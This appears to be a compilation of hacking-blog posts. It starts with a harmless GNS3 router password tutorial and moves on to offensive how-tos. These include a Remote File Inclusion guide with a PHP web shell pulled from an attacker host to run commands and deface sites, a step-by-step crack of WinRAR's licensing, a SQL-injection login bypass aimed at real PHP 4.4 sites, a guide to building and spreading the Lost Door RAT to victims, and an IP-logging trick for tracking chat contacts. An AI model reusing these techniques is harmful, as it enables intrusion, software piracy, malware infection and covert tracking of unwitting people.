GNS 3 Tutorial – Basic Router password Configuration..

Hi folks..I have started my first steps into Cisco, & would be sharing my small experiments in it. Actually , this time I am  covering the basics using GNS3 which is a powerful open source network simulator to simulate a simple topology of 2 routers with their basic configuration & commands. I assume you have worked with GNS3 or atleast know how to load IOS & make a simple topology..
So, firstly download GNS3 & install it. Get IOS images from and load them (if you are really not sure of this step, mail me, I will expand the basics more)
The topology I created is this -

2 routers connected via gigabit . What we will be doing is - 

1. Set router password.
2. Set telnet password
3. Set Console Password
4. Encrypt All passwords.
5. Set Ip Address of routers.

Anyways, I start by right clicking on R2 router.

Connected to Dynamips VM "R2" (ID 7, type c7200) - Console port

To get into privilege mode, type this command.

R2>en

To configure router, type this command ..

R2#conf t
Enter configuration commands, one per line.  End with CNTL/Z.

To set router password & encrypt all passwords type these commands

R2(config)#enable secret router2
R2(config)#service pass
R2(config)#service password-encryption

Now to set console & its password type these commands

R2(config)#line console 0
R2(config-line)#password console
R2(config-line)#login
R2(config-line)#exit

Now to set telnet (vty/virtual terminal) & its password type these commands

R2(config)#line vty 0 4
R2(config-line)#password telnet
R2(config-line)#login
R2(config-line)#exit

Once done, you can now configure the interface by typing these commands

R2(config)#int g1/0
R2(config-if)#desc ROUTER LAN 2 GIGABIT INTERFACE
R2(config-if)#ip address 192.168.1.20 255.255.255.0
R2(config-if)#no shut
R2(config-if)#
*Feb 19 19:56:42.035: %LINK-3-UPDOWN: Interface GigabitEthernet1/0, changed state to up
R2(config-if)#
*Feb 19 19:56:42.035: %ENTITY_ALARM-6-INFO: CLEAR INFO Gi1/0 Physical Port Administrative State Down
*Feb 19 19:56:43.035: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet1/0, changed state to up
R2(config-if)#end
*Feb 19 19:56:47.723: %SYS-5-CONFIG_I: Configured from console by console
R2#

Once done, you can see the configuration by typing -

R2#show running-config
Building configuration... 
Current configuration : 932 bytes
!
upgrade fpd auto
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname R2
!
boot-start-marker
boot-end-marker
!
enable secret 5 $1$trNZ$uNTgBIA1QG43/4YEB29lf/
!
no aaa new-model
ip cef
!
!
!
!
no ip domain lookup
!
multilink bundle-name authenticated
!
!
!
archive
log config
  hidekeys
!
!
interface FastEthernet0/0
no ip address
shutdown
duplex half
!
interface GigabitEthernet1/0
description ROUTER LAN 2 GIGABIT INTERFACE
ip address 192.168.1.20 255.255.255.0
negotiation auto
!
no ip http server
no ip http secure-server
!
!
!
logging alarm informational
!
!
control-plane
!
!
gatekeeper
shutdown
!
!
line con 0
exec-timeout 0 0
password 7 070C2E425D061500
logging synchronous
login
stopbits 1
line aux 0
stopbits 1
line vty 0 4
password 7 06120A2D424B1D
login
! 
!
webvpn cef
!
end 
R2#

If done properly, it will look like more or less the same I have pasted above. Also, as you can see, all the passwords are encrypted. In the similar way you can configure Router 1. Make a note os passwords, I have kept quite simple passwords just to demonstrate the configuration. Please keep secure passwords ,

A simple tutorial on Remote File Inclusion (RFI)..

RFI stands for Remote File Inclusion, and it allows the attacker to upload a
 custom coded/malicious file on a website or server using a script. The vulnerability  exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.
RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or touse automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -

• Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
• Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.
• Case 3 – successfull execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

echo "";
echo "Run command: ".htmlspecialchars($_GET['cmd']); 
system($_GET['cmd']);

?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript
http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..
I leave the rest on your creativity..

An Introduction to Revrerse Engineering - Reversing Winrar step by step...

Hi folks,its been a long time since I have posted some thing technical,so I will be writing about the challenge I got at NIT KU, where I reverse engineered WinRAR 3.80 using a disassembler and will tell you the same here. Furthermore, major software are analysed using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to reverse engineering and disassembling.

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.

The Tools
To perform this hack you will be needing -

1. Any De-assembler (I use Hackers Disassembler and Hview )
2. Resource Hacker
3. A patch Creator ( Use Universal Patch Creator or Code fusion)

You will be able to get them by googling ..

How to Reverse Engineer?
You need to have a bit knowledge of assembly language,and in case you don't have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.

I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .
Now copy the WinRAR.exe file to desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address
Now load Hackers Disasembler and load the copy in it.

The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter..

After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn't checks for the condition.

In the above code you can see this code -

00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12

This is the code responsible for validating you as a legal user :) . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71 .
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.

Now in the dialog box that opens,search for “please” and you will get the reference as -

ID-REMINDER, “Please purchase WinRAR license”

Double click on it and you will reach the subsequent code.

The code will be something like

* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB

Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.
Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.


Step 2 – Fixing and Patching
Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.

After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.

After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -

Type .444B71 in place of 00444B71

and search in the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes -



After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -



Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats..You have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE
Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.



Launch Resource Hacker, load the copyofwinrar.exe in it



Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one :P

and click on Compile Script button.



Now save the file with any name on your desktop or any location what so ever.



Now you have a fully patched WinRAR.exe file :)) . If you want to learn that, move on to next step.

Step 4 – Creating a working Patch (or giving Professional touch :P )
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.
Launch Patch Creator and click on add new project. Enter project Information and click on save.



Click on Add – ; Offset patch




After you have done that, double click on offset patch and then

1. Give path of original winrar.exe
2. Give path of unmodified Winrar.exe (again)
3. Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
4. Click on compare and it will show difference between both files
5. Click on save.

Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL work.

Congrats you have created a patch of your own and have learned to reverse engineer WinRAR :)

You can crack other software in the same way…just practice,debug and disassemble and you will get the way :)

[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. ]

Hacking PHP 4.4 sites in 20 seconds...

 Now here is  a real hacking tutorial in which I am going to hack a real website,and that too in less than 20 seconds.and I am not kidding. Actually sites with PHP 4.4 have a SQL injection vulnerability in them which makes their Admin control panel easily accessible,and I mean in one big shot,you will be admin of that site.
Remember,this tutorial is applicable on PHP4.4 machines with Apache running in parallel with them.Also,since I will be hacking REAL websites,I will not be displaying their URL’s or else I will be gunned down (by law of course :P).It will be partial in nature,that is I WILL not be teaching each and everything to you,I assume you know basics of SQL injection/PHP injection/Google searching,and if you don't then read these articles first - 

Google Search Tips for Hacking
Google Secrets – Some Cool Google Dorks
Basics of SQL Injection
SQL injection by example
Simple Nmap Scanning

In the mean time,here is how you can start -
Step 1 – Search for them
Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.
Step 2 – Scan them
Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.
Now just login using port 2000 ie -

http://www.website.com:2000

and you will be comfortably login into admin page like this -

Step 3 – Hack them
Now in the fields,you have to type -

username – admin
password – a’ or 1=1 or ‘b
domain - a’ or 1=1 or ‘b

and press go,you will login into admin

voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 20 seconds.
I hope that was informative :P go learn something.

SQL injection automated software SQLMAP...

Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here: 

Linux Source: sqlmap-0.7.tar.gz
Windows Portable: sqlmap-0.7_exe.zip

How to Control a Remote Computer using Lost Door...

Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim’s computer. Using a RAT you can do a lot of cool things such as “Upload, delete or modify data” , “Edit registry”, “Capture victim’s screen shot”, “Take control of victim’s Computer”or “Execute a virus” just with a click of a button.

Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.
Disclaimer: Coder and related sites are not responsible for any abuse done using this software.
Follow the steps below to setup a server for Lost Door.

• Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
• On executing the download file, you will see the following screen. Accept it

• After it is open, right click on the window and click on create server

• Now enter your IP address and DNS here. Leave the rest of the field as it is.

• Now click on the ‘Options’  tab and choose the options as you want. To activate an offline keylogger is a good practice.

• Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.

• Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.

Sending the server file to your victim

This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.

• If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
• For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.

Using Spreading to affect multiple victims

If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.

Download from here 

http://www.lost-door.com

Mousezahn - Open source free fast traffic generator and packet crafter tooll

Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible  packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks.
Mausezahn can be used for example:

• As traffic generator (e. g. to stress multicast networks)
• To precisely measure jitter (delay variations) between two hosts (e. g. for VoIP-SLA verification)
• As didactical tool during a datacom lecture or for lab exercises
• For penetration testing of firewalls and IDS
• For DoS attacks on networks (for audit purposes of course)
• To find bugs in network software or appliances
• For reconnaissance attacks using ping sweeps and port scans
• To test network behavior under strange circumstances (stress test, malformed packets)

Mausezahn is basically a versatile packet creation tool on the command line with a simple syntax and context help. It could also be used within (bash-) scripts to perform combination of tests. By the way, Mausezahn is quite fast; when started on my old PIII-Laptop (1.4 GHz, Gigabit Ethernet) I measured 755 Mbit/s using the interface packet counters of an HP ProCurve 5400 switch.
Currently Mausezahn is only available for Linux platforms. Please do NOT PORT Mausezahn to Windows!


Yoiu can download Mausezahn here:

mz-0.40.tar.gz

Or read more here.

How to bypass a keylogger, by fooling it.?

Hey guyzz today i m writing a small post on bypassing a keylogger , i found many of my friends asking me that , how to bypass a keylooger?  if installed in any computer which we are unkown as now a days evry body uses keyloggers , hidden trojans/servers, to spy on each nd evry activity on us . so, with this trick u can confuse a key logger to read the correct keystrokes.
                                         
lets move on to the main part.

1. Whenever u type a password on a webpage  to access ur account first of all never write the full password.
say for example i m taking a password DEVENDRA.  
first thing u should type is ENDR. now second thing keep ur hands off from the keybord nd just put your cursor back to the starting of password only with mouse nd type DEV, now aagain do d same thing nd take your cursor to d last place nd type A . now u can see d password is correctly entered in the block ie "DEVENDRA" but the keylogger will read the keystrokes as ENDRDEVA.  lolzz
using such type of method we can confuse /fool the keylogger nd the one who sypies on you.




2.Additionally ,you can also use spaces with you passwords as spaces are not readable. Use 2-3 spaces after or in the end (as prefix) for all your passwords. Gmail, yahoo , Facebook & so many other services supports spaces in password field.


so, just use certain methods like this nd m sure u will easily bypass keyloggers .


thanxx for reading the article , have a nyc day..:).!!!

Get Someone's IP Through AIM/MSN/Chat &location too..!!

Free location tracking codes will trace location of your chat buddy with the help of  IP lookup. 


These Location tracking codes, which you present in chat room
land on page with good pictures. meanwhile, the other chat buddy's IP Address is stored in a database. IP Look Up identify
Country, Near city, Local time, etc..  of the other buddy.

 Get Your  chat Tracking codes.
 After Sign Up, you get a set of tracking codes,
Using which you can find Location details.. of  your chat friends.

How to Sign Up

The process of sign up involves entering
1. First name2. Last name3. User name4. Pass word
Sign Up takes less than 20 Seconds to complete.
 Log In to your member page, where you find, your own personalized "Location tracking codes" ready to use in any chat rooms.
Member page has mainly two pages
1. Several Tracking Codes (page)
2. Track results (page)

How to Find Location of your chat friend
Very first step is Sign Up. and Log in your member area.

Copy any one tracking code
Past that code in chat room text box
Ask your chat friend  to click and see the picture.
After few seconds click Track Result link and find chat friend's location details.

Sign Up NOW
NOW U GOT THE IP ADRESS IF U WONT FIND ANY MAP OR LOACATION THEN COPY THE IP ADRESS ND GOTO: www.ip-adress.com  

nd paste ur ip ther nd search u will find location too..:D:D:D:D..!!!